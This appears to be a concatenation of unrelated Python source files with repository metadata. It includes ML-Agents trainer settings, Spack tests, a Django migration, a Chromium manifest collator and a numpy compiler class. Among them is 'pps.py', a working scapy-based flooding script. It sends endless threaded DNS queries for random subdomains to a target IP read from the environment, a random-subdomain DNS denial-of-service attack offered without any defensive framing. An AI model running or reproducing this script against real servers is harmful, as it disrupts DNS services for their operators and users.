buffer_size: int = 10240
learning_rate: float = 3.0e-4
learning_rate_schedule: ScheduleType = ScheduleType.CONSTANT
@attr.s(auto_attribs=True)
class PPOSettings(HyperparamSettings):
beta: float = 5.0e-3
epsilon: float = 0.2
lambd: float = 0.95
num_epoch: int = 3
learning_rate_schedule: ScheduleType = ScheduleType.LINEAR
@attr.s(auto_attribs=True)
class SACSettings(HyperparamSettings):
batch_size: int = 128
buffer_size: int = 50000
buffer_init_steps: int = 0
tau: float = 0.005
steps_per_update: float = 1
save_replay_buffer: bool = False
init_entcoef: float = 1.0
reward_signal_steps_per_update: float = attr.ib()
@reward_signal_steps_per_update.default
def _reward_signal_steps_per_update_default(self):
return self.steps_per_update
# INTRINSIC REWARD SIGNALS #############################################################
class RewardSignalType(Enum):
EXTRINSIC: str = "extrinsic"
GAIL: str = "gail"
CURIOSITY: str = "curiosity"
def to_settings(self) -> type:
_mapping = {
RewardSignalType.EXTRINSIC: RewardSignalSettings,
RewardSignalType.GAIL: GAILSettings,
RewardSignalType.CURIOSITY: CuriositySettings,
}
return _mapping[self]
@attr.s(auto_attribs=True)
class RewardSignalSettings:
gamma: float = 0.99
strength: float = 1.0
@staticmethod
def structure(d: Mapping, t: type) -> Any:
"""
Helper method to structure a Dict of RewardSignalSettings class. Meant to be registered with
cattr.register_structure_hook() and called with cattr.structure(). This is needed to handle
the special Enum selection of RewardSignalSettings classes.
"""
if not isinstance(d, Mapping):
raise TrainerConfigError(f"Unsupported reward signal configuration {d}.")
d_final: Dict[RewardSignalType, RewardSignalSettings] = {}
for key, val in d.items():
enum_key = RewardSignalType(key)
t = enum_key.to_settings()
d_final[enum_key] = strict_to_cls(val, t)
return d_final
@attr.s(auto_attribs=True)
class GAILSettings(RewardSignalSettings):
encoding_size: int = 64
learning_rate: float = 3e-4
use_actions: bool = False
use_vail: bool = False
demo_path: str = attr.ib(kw_only=True)
@attr.s(auto_attribs=True)
class CuriositySettings(RewardSignalSettings):
encoding_size: int = 64
learning_rate: float = 3e-4
# SAMPLERS #############################################################################
class ParameterRandomizationType(Enum):
UNIFORM: str = "uniform"
GAUSSIAN: str = "gaussian"
MULTIRANGEUNIFORM: str = "multirangeuniform"
CONSTANT: str = "constant"
def to_settings(self) -> type:
_mapping = {
ParameterRandomizationType.UNIFORM: UniformSettings,
ParameterRandomizationType.GAUSSIAN: GaussianSettings,
ParameterRandomizationType.MULTIRANGEUNIFORM: MultiRangeUniformSettings,
ParameterRandomizationType.CONSTANT: ConstantSettings
# Constant type is handled if a float is provided instead of a config
}
return _mapping[self]
@attr.s(auto_attribs=True)
class ParameterRandomizationSettings(abc.ABC):
seed: int = parser.get_default("seed")
@staticmethod
def structure(
d: Union[Mapping, float], t: type
) -> "ParameterRandomizationSettings":
"""
Helper method to a ParameterRandomizationSettings class. Meant to be registered with
cattr.register_structure_hook() and called with cattr.structure(). This is needed to handle
the special Enum selection of ParameterRandomizationSettings classes.
"""
if isinstance(d, (float, int)):
return ConstantSettings(value=d)
if not isinstance(d, Mapping):
raise TrainerConfigError(
f"Unsupported parameter randomization configuration {d}."
)
if "sampler_type" not in d:
raise TrainerConfigError(
f"Sampler configuration does not contain sampler_type : {d}."
)
if "sampler_parameters" not in d:
raise TrainerConfigError(
f"Sampler configuration does not contain sampler_parameters : {d}."
)
enum_key = ParameterRandomizationType(d["sampler_type"])
t = enum_key.to_settings()
return strict_to_cls(d["sampler_parameters"], t)
@staticmethod
def unstructure(d: "ParameterRandomizationSettings") -> Mapping:
"""
Helper method to a ParameterRandomizationSettings class. Meant to be registered with
cattr.register_unstructure_hook() and called with cattr.unstructure().
"""
_reversed_mapping = {
UniformSettings: ParameterRandomizationType.UNIFORM,
GaussianSettings: ParameterRandomizationType.GAUSSIAN,
MultiRangeUniformSettings: ParameterRandomizationType.MULTIRANGEUNIFORM,
ConstantSettings: ParameterRandomizationType.CONSTANT,
}
sampler_type: Optional[str] = None
for t, name in _reversed_mapping.items():
if isinstance(d, t):
sampler_type = name.value
sampler_parameters = attr.asdict(d)
return {"sampler_type": sampler_type, "sampler_parameters": sampler_parameters}
@abc.abstractmethod
def apply(self, key: str, env_channel: EnvironmentParametersChannel) -> None:
"""
Helper method to send sampler settings over EnvironmentParametersChannel
Calls the appropriate sampler type set method.
:param key: environment parameter to be sampled
:param env_channel: The EnvironmentParametersChannel to communicate sampler settings to environment
"""
pass
@attr.s(auto_attribs=True)
class ConstantSettings(ParameterRandomizationSettings):
value: float = 0.0
def apply(self, key: str, env_channel: EnvironmentParametersChannel) -> None:
"""
Helper method to send sampler settings over EnvironmentParametersChannel
Calls the constant sampler type set method.
:param key: environment parameter to be sampled
:param env_channel: The EnvironmentParametersChannel to communicate sampler settings to environment
"""
env_channel.set_float_parameter(key, self.value)
@attr.s(auto_attribs=True)
class UniformSettings(ParameterRandomizationSettings):
min_value: float = attr.ib()
max_value: float = 1.0
@min_value.default
def _min_value_default(self):
return 0.0
@min_value.validator
def _check_min_value(self, attribute, value):
if self.min_value > self.max_value:
raise TrainerConfigError(
"Minimum value is greater than maximum value in uniform sampler."
)
def apply(self, key: str, env_channel: EnvironmentParametersChannel) -> None:
"""
Helper method to send sampler settings over EnvironmentParametersChannel
Calls the uniform sampler type set method.
:param key: environment parameter to be sampled
:param env_channel: The EnvironmentParametersChannel to communicate sampler settings to environment
"""
env_channel.set_uniform_sampler_parameters(
key, self.min_value, self.max_value, self.seed
)
@attr.s(auto_attribs=True)
class GaussianSettings(ParameterRandomizationSettings):
mean: float = 1.0
st_dev: float = 1.0
def apply(self, key: str, env_channel: EnvironmentParametersChannel) -> None:
"""
Helper method to send sampler settings over EnvironmentParametersChannel
Calls the gaussian sampler type set method.
:param key: environment parameter to be sampled
:param env_channel: The EnvironmentParametersChannel to communicate sampler settings to environment
"""
env_channel.set_gaussian_sampler_parameters(
key, self.mean, self.st_dev, self.seed
)
@attr.s(auto_attribs=True)
class MultiRangeUniformSettings(ParameterRandomizationSettings):
intervals: List[Tuple[float, float]] = attr.ib()
@intervals.default
def _intervals_default(self):
return [[0.0, 1.0]]
@intervals.validator
def _check_intervals(self, attribute, value):
for interval in self.intervals:
if len(interval) != 2:
raise TrainerConfigError(
f"The sampling interval {interval} must contain exactly two values."
)
min_value, max_value = interval
if min_value > max_value:
raise TrainerConfigError(
f"Minimum value is greater than maximum value in interval {interval}."
)
def apply(self, key: str, env_channel: EnvironmentParametersChannel) -> None:
"""
Helper method to send sampler settings over EnvironmentParametersChannel
Calls the multirangeuniform sampler type set method.
:param key: environment parameter to be sampled
:param env_channel: The EnvironmentParametersChannel to communicate sampler settings to environment
"""
env_channel.set_multirangeuniform_sampler_parameters(
key, self.intervals, self.seed
)
# ENVIRONMENT PARAMETERS ###############################################################
@attr.s(auto_attribs=True)
class CompletionCriteriaSettings:
"""
CompletionCriteriaSettings contains the information needed to figure out if the next
lesson must start.
"""
class MeasureType(Enum):
PROGRESS: str = "progress"
REWARD: str = "reward"
behavior: str
measure: MeasureType = attr.ib(default=MeasureType.REWARD)
min_lesson_length: int = 0
signal_smoothing: bool = True
threshold: float = attr.ib(default=0.0)
require_reset: bool = False
@threshold.validator
def _check_threshold_value(self, attribute, value):
"""
Verify that the threshold has a value between 0 and 1 when the measure is
PROGRESS
"""
if self.measure == self.MeasureType.PROGRESS:
if self.threshold > 1.0:
raise TrainerConfigError(
"Threshold for next lesson cannot be greater than 1 when the measure is progress."
)
if self.threshold < 0.0:
raise TrainerConfigError(
"Threshold for next lesson cannot be negative when the measure is progress."
)
def need_increment(
self, progress: float, reward_buffer: List[float], smoothing: float
) -> Tuple[bool, float]:
"""
Given measures, this method returns a boolean indicating if the lesson
needs to change now, and a float corresponding to the new smoothed value.
"""
# Is the min number of episodes reached
if len(reward_buffer) < self.min_lesson_length:
return False, smoothing
if self.measure == CompletionCriteriaSettings.MeasureType.PROGRESS:
if progress > self.threshold:
return True, smoothing
if self.measure == CompletionCriteriaSettings.MeasureType.REWARD:
if len(reward_buffer) < 1:
return False, smoothing
measure = np.mean(reward_buffer)
if math.isnan(measure):
return False, smoothing
if self.signal_smoothing:
measure = 0.25 * smoothing + 0.75 * measure
smoothing = measure
if measure > self.threshold:
return True, smoothing
return False, smoothing
@attr.s(auto_attribs=True)
class Lesson:
"""
Gathers the data of one lesson for one environment parameter including its name,
the condition that must be fullfiled for the lesson to be completed and a sampler
for the environment parameter. If the completion_criteria is None, then this is
the last lesson in the curriculum.
"""
value: ParameterRandomizationSettings
name: str
completion_criteria: Optional[CompletionCriteriaSettings] = attr.ib(default=None)
@attr.s(auto_attribs=True)
class EnvironmentParameterSettings:
"""
EnvironmentParameterSettings is an ordered list of lessons for one environment
parameter.
"""
curriculum: List[Lesson]
@staticmethod
def _check_lesson_chain(lessons, parameter_name):
"""
Ensures that when using curriculum, all non-terminal lessons have a valid
CompletionCriteria, and that the terminal lesson does not contain a CompletionCriteria.
"""
num_lessons = len(lessons)
for index, lesson in enumerate(lessons):
if index < num_lessons - 1 and lesson.completion_criteria is None:
raise TrainerConfigError(
f"A non-terminal lesson does not have a completion_criteria for {parameter_name}."
)
if index == num_lessons - 1 and lesson.completion_criteria is not None:
warnings.warn(
f"Your final lesson definition contains completion_criteria for {parameter_name}."
f"It will be ignored.",
TrainerConfigWarning,
)
@staticmethod
def structure(d: Mapping, t: type) -> Dict[str, "EnvironmentParameterSettings"]:
"""
Helper method to structure a Dict of EnvironmentParameterSettings class. Meant
to be registered with cattr.register_structure_hook() and called with
cattr.structure().
"""
if not isinstance(d, Mapping):
raise TrainerConfigError(
f"Unsupported parameter environment parameter settings {d}."
)
d_final: Dict[str, EnvironmentParameterSettings] = {}
for environment_parameter, environment_parameter_config in d.items():
if (
isinstance(environment_parameter_config, Mapping)
and "curriculum" in environment_parameter_config
):
d_final[environment_parameter] = strict_to_cls(
environment_parameter_config, EnvironmentParameterSettings
)
EnvironmentParameterSettings._check_lesson_chain(
d_final[environment_parameter].curriculum, environment_parameter
)
else:
sampler = ParameterRandomizationSettings.structure(
environment_parameter_config, ParameterRandomizationSettings
)
d_final[environment_parameter] = EnvironmentParameterSettings(
curriculum=[
Lesson(
completion_criteria=None,
value=sampler,
name=environment_parameter,
)
]
)
return d_final
# TRAINERS #############################################################################
@attr.s(auto_attribs=True)
class SelfPlaySettings:
save_steps: int = 20000
team_change: int = attr.ib()
@team_change.default
def _team_change_default(self):
# Assign team_change to about 4x save_steps
return self.save_steps * 5
swap_steps: int = 2000
window: int = 10
play_against_latest_model_ratio: float = 0.5
initial_elo: float = 1200.0
class TrainerType(Enum):
PPO: str = "ppo"
SAC: str = "sac"
def to_settings(self) -> type:
_mapping = {TrainerType.PPO: PPOSettings, TrainerType.SAC: SACSettings}
return _mapping[self]
@attr.s(auto_attribs=True)
class TrainerSettings(ExportableSettings):
trainer_type: TrainerType = TrainerType.PPO
hyperparameters: HyperparamSettings = attr.ib()
@hyperparameters.default
def _set_default_hyperparameters(self):
return self.trainer_type.to_settings()()
network_settings: NetworkSettings = attr.ib(factory=NetworkSettings)
reward_signals: Dict[RewardSignalType, RewardSignalSettings] = attr.ib(
factory=lambda: {RewardSignalType.EXTRINSIC: RewardSignalSettings()}
)
init_path: Optional[str] = None
keep_checkpoints: int = 5
checkpoint_interval: int = 500000
max_steps: int = 500000
time_horizon: int = 64
summary_freq: int = 50000
threaded: bool = True
self_play: Optional[SelfPlaySettings] = None
behavioral_cloning: Optional[BehavioralCloningSettings] = None
cattr.register_structure_hook(
Dict[RewardSignalType, RewardSignalSettings], RewardSignalSettings.structure
)
@network_settings.validator
def _check_batch_size_seq_length(self, attribute, value):
if self.network_settings.memory is not None:
if (
self.network_settings.memory.sequence_length
> self.hyperparameters.batch_size
):
raise TrainerConfigError(
"When using memory, sequence length must be less than or equal to batch size. "
)
@staticmethod
def dict_to_defaultdict(d: Dict, t: type) -> DefaultDict:
return collections.defaultdict(
TrainerSettings, cattr.structure(d, Dict[str, TrainerSettings])
)
@staticmethod
def structure(d: Mapping, t: type) -> Any:
"""
Helper method to structure a TrainerSettings class. Meant to be registered with
cattr.register_structure_hook() and called with cattr.structure().
"""
if not isinstance(d, Mapping):
raise TrainerConfigError(f"Unsupported config {d} for {t.__name__}.")
d_copy: Dict[str, Any] = {}
d_copy.update(d)
for key, val in d_copy.items():
if attr.has(type(val)):
# Don't convert already-converted attrs classes.
continue
if key == "hyperparameters":
if "trainer_type" not in d_copy:
raise TrainerConfigError(
"Hyperparameters were specified but no trainer_type was given."
)
else:
d_copy[key] = strict_to_cls(
d_copy[key], TrainerType(d_copy["trainer_type"]).to_settings()
)
elif key == "max_steps":
d_copy[key] = int(float(val))
# In some legacy configs, max steps was specified as a float
else:
d_copy[key] = check_and_structure(key, val, t)
return t(**d_copy)
# COMMAND LINE #########################################################################
@attr.s(auto_attribs=True)
class CheckpointSettings:
run_id: str = parser.get_default("run_id")
initialize_from: Optional[str] = parser.get_default("initialize_from")
load_model: bool = parser.get_default("load_model")
resume: bool = parser.get_default("resume")
force: bool = parser.get_default("force")
train_model: bool = parser.get_default("train_model")
inference: bool = parser.get_default("inference")
@attr.s(auto_attribs=True)
class EnvironmentSettings:
env_path: Optional[str] = parser.get_default("env_path")
env_args: Optional[List[str]] = parser.get_default("env_args")
base_port: int = parser.get_default("base_port")
num_envs: int = attr.ib(default=parser.get_default("num_envs"))
seed: int = parser.get_default("seed")
@num_envs.validator
def validate_num_envs(self, attribute, value):
if value > 1 and self.env_path is None:
raise ValueError("num_envs must be 1 if env_path is not set.")
@attr.s(auto_attribs=True)
class EngineSettings:
width: int = parser.get_default("width")
height: int = parser.get_default("height")
quality_level: int = parser.get_default("quality_level")
time_scale: float = parser.get_default("time_scale")
target_frame_rate: int = parser.get_default("target_frame_rate")
capture_frame_rate: int = parser.get_default("capture_frame_rate")
no_graphics: bool = parser.get_default("no_graphics")
@attr.s(auto_attribs=True)
class RunOptions(ExportableSettings):
behaviors: DefaultDict[str, TrainerSettings] = attr.ib(
factory=lambda: collections.defaultdict(TrainerSettings)
)
env_settings: EnvironmentSettings = attr.ib(factory=EnvironmentSettings)
engine_settings: EngineSettings = attr.ib(factory=EngineSettings)
environment_parameters: Optional[Dict[str, EnvironmentParameterSettings]] = None
checkpoint_settings: CheckpointSettings = attr.ib(factory=CheckpointSettings)
# These are options that are relevant to the run itself, and not the engine or environment.
# They will be left here.
debug: bool = parser.get_default("debug")
# Strict conversion
cattr.register_structure_hook(EnvironmentSettings, strict_to_cls)
cattr.register_structure_hook(EngineSettings, strict_to_cls)
cattr.register_structure_hook(CheckpointSettings, strict_to_cls)
cattr.register_structure_hook(
Dict[str, EnvironmentParameterSettings], EnvironmentParameterSettings.structure
)
cattr.register_structure_hook(Lesson, strict_to_cls)
cattr.register_structure_hook(
ParameterRandomizationSettings, ParameterRandomizationSettings.structure
)
cattr.register_unstructure_hook(
ParameterRandomizationSettings, ParameterRandomizationSettings.unstructure
)
cattr.register_structure_hook(TrainerSettings, TrainerSettings.structure)
cattr.register_structure_hook(
DefaultDict[str, TrainerSettings], TrainerSettings.dict_to_defaultdict
)
cattr.register_unstructure_hook(collections.defaultdict, defaultdict_to_dict)
@staticmethod
def from_argparse(args: argparse.Namespace) -> "RunOptions":
"""
Takes an argparse.Namespace as specified in `parse_command_line`, loads input configuration files
from file paths, and converts to a RunOptions instance.
:param args: collection of command-line parameters passed to mlagents-learn
:return: RunOptions representing the passed in arguments, with trainer config, curriculum and sampler
configs loaded from files.
"""
argparse_args = vars(args)
config_path = StoreConfigFile.trainer_config_path
# Load YAML
configured_dict: Dict[str, Any] = {
"checkpoint_settings": {},
"env_settings": {},
"engine_settings": {},
}
if config_path is not None:
configured_dict.update(load_config(config_path))
# Use the YAML file values for all values not specified in the CLI.
for key in configured_dict.keys():
# Detect bad config options
if key not in attr.fields_dict(RunOptions):
raise TrainerConfigError(
"The option {} was specified in your YAML file, but is invalid.".format(
key
)
)
# Override with CLI args
# Keep deprecated --load working, TODO: remove
argparse_args["resume"] = argparse_args["resume"] or argparse_args["load_model"]
for key, val in argparse_args.items():
if key in DetectDefault.non_default_args:
if key in attr.fields_dict(CheckpointSettings):
configured_dict["checkpoint_settings"][key] = val
elif key in attr.fields_dict(EnvironmentSettings):
configured_dict["env_settings"][key] = val
elif key in attr.fields_dict(EngineSettings):
configured_dict["engine_settings"][key] = val
else: # Base options
configured_dict[key] = val
return RunOptions.from_dict(configured_dict)
@staticmethod
def from_dict(options_dict: Dict[str, Any]) -> "RunOptions":
return cattr.structure(options_dict, RunOptions)
| 37.513736 | 109 | 0.655181 |
50eed5454c3f0afc7c0dd18a1b05db23ca21f1d4 | 151 | py | Python | tests/__init__.py | caominhduy/epicas | 989b792380ffd47e879c54881447c1d6b1caf67e | [
"Apache-2.0"
] | null | null | null | tests/__init__.py | caominhduy/epicas | 989b792380ffd47e879c54881447c1d6b1caf67e | [
"Apache-2.0"
] | null | null | null | tests/__init__.py | caominhduy/epicas | 989b792380ffd47e879c54881447c1d6b1caf67e | [
"Apache-2.0"
] | null | null | null | from .data_loading_test import StructuredDataTest
from .feature_engineering_test import FeatureEngineeringTest
from .model_test import SingleModelTest
| 37.75 | 60 | 0.900662 |
e7043672bc1e35842735620464e1d8636dbcd68f | 1,049 | py | Python | lib/spack/spack/test/cmd/arch.py | player1537-forks/spack | 822b7632222ec5a91dc7b7cda5fc0e08715bd47c | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 11 | 2015-10-04T02:17:46.000Z | 2018-02-07T18:23:00.000Z | lib/spack/spack/test/cmd/arch.py | player1537-forks/spack | 822b7632222ec5a91dc7b7cda5fc0e08715bd47c | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 22 | 2017-08-01T22:45:10.000Z | 2022-03-10T07:46:31.000Z | lib/spack/spack/test/cmd/arch.py | player1537-forks/spack | 822b7632222ec5a91dc7b7cda5fc0e08715bd47c | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 4 | 2016-06-10T17:57:39.000Z | 2018-09-11T04:59:38.000Z | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack.main import SpackCommand
arch = SpackCommand('arch')
def test_arch():
"""Sanity check ``spack arch`` to make sure it works."""
arch()
arch('-f')
arch('--frontend')
arch('-b')
arch('--backend')
def test_arch_platform():
"""Sanity check ``spack arch --platform`` to make sure it works."""
arch('-p')
arch('--platform')
arch('-f', '-p')
arch('-b', '-p')
def test_arch_operating_system():
"""Sanity check ``spack arch --operating-system`` to make sure it works."""
arch('-o')
arch('--operating-system')
arch('-f', '-o')
arch('-b', '-o')
def test_arch_target():
"""Sanity check ``spack arch --target`` to make sure it works."""
arch('-t')
arch('--target')
arch('-f', '-t')
arch('-b', '-t')
def test_display_targets():
arch('--known-targets')
| 20.98 | 79 | 0.601525 |
26201e864403fe9e8549d75291573e79dd767d18 | 478 | py | Python | recipes/migrations/0009_alter_recipe_servings.py | sergeant-savage/my-recipe-app | cb1b5c05928689aed2c1637d8b4cf1ab08daf4b6 | [
"MIT"
] | 1 | 2021-08-11T11:43:06.000Z | 2021-08-11T11:43:06.000Z | recipes/migrations/0009_alter_recipe_servings.py | sergeant-savage/my-recipe-app | cb1b5c05928689aed2c1637d8b4cf1ab08daf4b6 | [
"MIT"
] | 8 | 2021-08-11T00:55:32.000Z | 2021-08-15T20:48:59.000Z | recipes/migrations/0009_alter_recipe_servings.py | sergeant-savage/my-recipe-app | cb1b5c05928689aed2c1637d8b4cf1ab08daf4b6 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.5 on 2021-07-24 21:16
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('recipes', '0008_alter_recipe_servings'),
]
operations = [
migrations.AlterField(
model_name='recipe',
name='servings',
field=models.IntegerField(default=1, validators=[django.core.validators.MinValueValidator(1)]),
),
]
| 23.9 | 107 | 0.646444 |
42cef4905b4319ac091db49a348812043b96faef | 3,997 | py | Python | services/service_manager/public/tools/manifest/manifest_collator.py | zipated/src | 2b8388091c71e442910a21ada3d97ae8bc1845d3 | [
"BSD-3-Clause"
] | 2,151 | 2020-04-18T07:31:17.000Z | 2022-03-31T08:39:18.000Z | services/service_manager/public/tools/manifest/manifest_collator.py | cangulcan/src | 2b8388091c71e442910a21ada3d97ae8bc1845d3 | [
"BSD-3-Clause"
] | 395 | 2020-04-18T08:22:18.000Z | 2021-12-08T13:04:49.000Z | services/service_manager/public/tools/manifest/manifest_collator.py | cangulcan/src | 2b8388091c71e442910a21ada3d97ae8bc1845d3 | [
"BSD-3-Clause"
] | 338 | 2020-04-18T08:03:10.000Z | 2022-03-29T12:33:22.000Z | #!/usr/bin/env python
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
""" A collator for Service Manifests """
import argparse
import json
import os
import shutil
import sys
import urlparse
# Keys which are completely overridden by manifest overlays
_MANIFEST_OVERLAY_OVERRIDE_KEYS = [
"display_name",
]
# Keys which are merged with content from manifest overlays
_MANIFEST_OVERLAY_MERGE_KEYS = [
"interface_provider_specs",
"required_files",
]
eater_relative = "../../../../../../tools/json_comment_eater"
eater_relative = os.path.join(os.path.abspath(__file__), eater_relative)
sys.path.insert(0, os.path.normpath(eater_relative))
try:
import json_comment_eater
finally:
sys.path.pop(0)
def ParseJSONFile(filename):
with open(filename) as json_file:
try:
return json.loads(json_comment_eater.Nom(json_file.read()))
except ValueError as e:
print "%s is not a valid JSON document" % filename
raise e
def MergeDicts(left, right):
for k, v in right.iteritems():
if k not in left:
left[k] = v
else:
if isinstance(v, dict):
assert isinstance(left[k], dict)
MergeDicts(left[k], v)
elif isinstance(v, list):
assert isinstance(left[k], list)
left[k].extend(v)
else:
raise "Refusing to merge conflicting non-collection values."
return left
def MergeManifestOverlay(manifest, overlay):
for key in _MANIFEST_OVERLAY_MERGE_KEYS:
if key in overlay:
MergeDicts(manifest[key], overlay[key])
if "services" in overlay:
if "services" not in manifest:
manifest["services"] = []
manifest["services"].extend(overlay["services"])
for key in _MANIFEST_OVERLAY_OVERRIDE_KEYS:
if key in overlay:
manifest[key] = overlay[key]
def SanityCheckManifestServices(manifest):
"""Ensures any given service name appears only once within a manifest."""
known_services = set()
def has_no_dupes(root):
if "name" in root:
name = root["name"]
if name in known_services:
raise ValueError(
"Duplicate manifest entry found for service: %s" % name)
known_services.add(name)
if "services" not in root:
return True
return all(has_no_dupes(service) for service in root["services"])
return has_no_dupes(manifest)
def main():
parser = argparse.ArgumentParser(
description="Collate Service Manifests.")
parser.add_argument("--parent")
parser.add_argument("--output")
parser.add_argument("--name")
parser.add_argument("--pretty", action="store_true")
parser.add_argument("--overlays", nargs="+", dest="overlays", default=[])
parser.add_argument("--packaged-services", nargs="+",
dest="packaged_services", default=[])
args, _ = parser.parse_known_args()
parent = ParseJSONFile(args.parent)
service_name = parent["name"] if "name" in parent else ""
if args.name and args.name != service_name:
raise ValueError("Service name '%s' specified in build file does not " \
"match name '%s' specified in manifest." %
(args.name, service_name))
packaged_services = []
for child_manifest in args.packaged_services:
packaged_services.append(ParseJSONFile(child_manifest))
if len(packaged_services) > 0:
if "services" not in parent:
parent["services"] = packaged_services
else:
parent["services"].extend(packaged_services)
for overlay_path in args.overlays:
MergeManifestOverlay(parent, ParseJSONFile(overlay_path))
with open(args.output, "w") as output_file:
json.dump(parent, output_file, indent=2 if args.pretty else -1)
# NOTE: We do the sanity check and possible failure *after* outputting the
# aggregate manifest so it's easier to inspect erroneous output.
SanityCheckManifestServices(parent)
return 0
if __name__ == "__main__":
sys.exit(main())
| 29.175182 | 76 | 0.694021 |
5560e199aac68e390d0d8c9f15e4f64ab1d15f1c | 1,460 | py | Python | numpy/distutils/fcompiler/hpux.py | WeatherGod/numpy | 5be45b280b258e158b93163b937f8f9c08d30393 | [
"BSD-3-Clause"
] | 4 | 2020-01-28T08:48:27.000Z | 2022-02-09T18:45:34.000Z | numpy/distutils/fcompiler/hpux.py | WeatherGod/numpy | 5be45b280b258e158b93163b937f8f9c08d30393 | [
"BSD-3-Clause"
] | null | null | null | numpy/distutils/fcompiler/hpux.py | WeatherGod/numpy | 5be45b280b258e158b93163b937f8f9c08d30393 | [
"BSD-3-Clause"
] | 1 | 2015-10-08T10:27:03.000Z | 2015-10-08T10:27:03.000Z | from __future__ import division, absolute_import, print_function
from numpy.distutils.fcompiler import FCompiler
compilers = ['HPUXFCompiler']
class HPUXFCompiler(FCompiler):
compiler_type = 'hpux'
description = 'HP Fortran 90 Compiler'
version_pattern = r'HP F90 (?P<version>[^\s*,]*)'
executables = {
'version_cmd' : ["f90", "+version"],
'compiler_f77' : ["f90"],
'compiler_fix' : ["f90"],
'compiler_f90' : ["f90"],
'linker_so' : ["ld", "-b"],
'archiver' : ["ar", "-cr"],
'ranlib' : ["ranlib"]
}
module_dir_switch = None #XXX: fix me
module_include_switch = None #XXX: fix me
pic_flags = ['+Z']
def get_flags(self):
return self.pic_flags + ['+ppu', '+DD64']
def get_flags_opt(self):
return ['-O3']
def get_libraries(self):
return ['m']
def get_library_dirs(self):
opt = ['/usr/lib/hpux64']
return opt
def get_version(self, force=0, ok_status=[256,0,1]):
# XXX status==256 may indicate 'unrecognized option' or
# 'no input file'. So, version_cmd needs more work.
return FCompiler.get_version(self,force,ok_status)
if __name__ == '__main__':
from distutils import log
log.set_verbosity(10)
from numpy.distutils.fcompiler import new_fcompiler
compiler = new_fcompiler(compiler='hpux')
compiler.customize()
print(compiler.get_version())
| 31.73913 | 64 | 0.612329 |
e106b2f00fe254cf234ec39b6ade4b0a24480846 | 213 | py | Python | tatau_core/nn/torch/summarizer/median.py | makar21/core | e6a0c8d5456567dd3139ee3fd3cf6cd4acdd4a05 | [
"Apache-2.0"
] | null | null | null | tatau_core/nn/torch/summarizer/median.py | makar21/core | e6a0c8d5456567dd3139ee3fd3cf6cd4acdd4a05 | [
"Apache-2.0"
] | null | null | null | tatau_core/nn/torch/summarizer/median.py | makar21/core | e6a0c8d5456567dd3139ee3fd3cf6cd4acdd4a05 | [
"Apache-2.0"
] | null | null | null | from .model import ModelSummarizer
import numpy as np
class Median(ModelSummarizer):
"""
Median State Summarizer
"""
def __init__(self):
super(Median, self).__init__(np_sum_fn=np.median)
| 19.363636 | 57 | 0.690141 |
5005503ccffe9e23891bbcef6ee608dfc86fde28 | 2,026 | py | Python | pps/pps.py | evanscottgray/dtaas | 97bed659e1598094905e083e2a9261a3b1cb7219 | [
"MIT"
] | 3 | 2015-02-26T22:38:59.000Z | 2019-09-17T22:22:28.000Z | pps/pps.py | evanscottgray/dtaas | 97bed659e1598094905e083e2a9261a3b1cb7219 | [
"MIT"
] | null | null | null | pps/pps.py | evanscottgray/dtaas | 97bed659e1598094905e083e2a9261a3b1cb7219 | [
"MIT"
] | null | null | null | #!/bin/python
import sys
import threading
from scapy.config import conf
conf.ipv6_enabled = False
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import fcntl, socket, struct
from collections import OrderedDict
from time import sleep
from httplib import HTTPConnection, _CS_IDLE
import urlparse, string, random
victim = os.getenv('TARGET', '127.0.0.1')
dst_mac = None
while dst_mac == None:
dst_mac = getmacbyip(victim)
interface = conf.route.route(victim)[0]
threads = os.getenv('THREADS', '10')
def getHwAddr(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', ifname[:15]))
return ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
class RandNormalIP(RandString):
def __init__(self, iptemplate="0.0.0.0/0"):
self.ip = Net(iptemplate)
def _fix(self):
x = self.ip.choice()
while ((x in Net("0.0.0.0/8")) or (x in Net("10.0.0.0/8")) or (x in Net("127.0.0.0/8"))
or (x in Net("172.16.0.0/12")) or (x in Net("192.168.0.0/16")) or (x in Net("224.0.0.0/4"))):
x = self.ip.choice()
return x
class RandFinalString(RandString):
def __init__(self, size, term):
RandString.__init__(self, size)
self.term = term
def _fix(self):
return RandString._fix(self)+self.term
class attack(threading.Thread):
def __init__ (self):
threading.Thread.__init__(self)
def run(self):
print('Sending DNS A queries for <random>.domain.net to '+victim+' ('+dst_mac+') from '+interface+' interface. Press Ctrl-C to interrupt')
while True:
sendp(Ether(src=getHwAddr(interface),dst=dst_mac)/IP(dst=victim)/UDP(sport=RandShort(),dport=53)/DNS(rd=1,qd=DNSQR(qname=RandFinalString(10,".domain.net"))),iface=interface,inter=0,loop=1)
for host in range(int(threads)):
try:
port = sys.argv[2]
except IndexError:
at = attack()
at.start()
| 33.213115 | 197 | 0.653504 |
8acea70ede149f8c662b46cf0e9c0302f98d1126 | 5,107 | py | Python | ppgan/models/discriminators/discriminator_styleganv2.py | pcwuyu/PaddleGAN | b4ff90f0c92c4d8dcaa8e25267151b82fc7aa268 | [
"Apache-2.0"
] | 3 | 2022-02-20T11:40:50.000Z | 2022-02-20T11:46:29.000Z | ppgan/models/discriminators/discriminator_styleganv2.py | pcwuyu/PaddleGAN | b4ff90f0c92c4d8dcaa8e25267151b82fc7aa268 | [
"Apache-2.0"
] | 38 | 2021-10-14T12:55:45.000Z | 2021-12-24T06:09:10.000Z | ppgan/models/discriminators/discriminator_styleganv2.py | pcwuyu/PaddleGAN | b4ff90f0c92c4d8dcaa8e25267151b82fc7aa268 | [
"Apache-2.0"
] | 1 | 2021-09-22T09:29:19.000Z | 2021-09-22T09:29:19.000Z | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve.
#
